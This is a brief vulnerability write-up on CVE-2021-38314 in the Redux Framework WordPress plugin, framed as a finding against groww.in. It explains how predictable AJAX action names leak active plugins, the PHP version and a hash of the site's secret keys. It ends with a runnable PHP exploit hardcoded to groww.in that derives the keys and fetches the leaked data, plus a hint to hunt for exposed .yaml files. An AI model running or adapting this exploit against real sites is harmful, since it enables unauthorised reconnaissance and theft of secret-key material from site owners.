Write-up

CVE-2021-38314 in groww.in

Bug Name :- info leaking
Bug Priority :- Medium

      

Description

The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of ‘-redux’ and an md5 hash of the previous hash with a known salt value of ‘-support’. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site’s PHP version, and an unsalted md5 hash of site’s `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`.

Impact

Attacker can retrieve sensitive information such as a list of active plugins and their versions, the site’s PHP version, and an unsalted md5 hash of site’s `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`. This would be most useful in cases where a separate plugin with an additional vulnerability was installed, as an attacker could use the information to save time and plan an intrusion.

Hints

Always lock for .yaml or .yml files

Exploit php code

<?php $target = "https://groww.in"; $key1 = md5("$target/-redux"); $key2 = file_get_contents("$target/wp-admin/admin-ajax.php?action=$key1"); $key3 = md5($key2.'-support'); $redux_code = file_get_contents("http://verify.redux.io/?hash=$key3&site=$target/"); echo file_get_contents("$target/wp-admin/admin-ajax.php?action=$key3&code=$redux_code");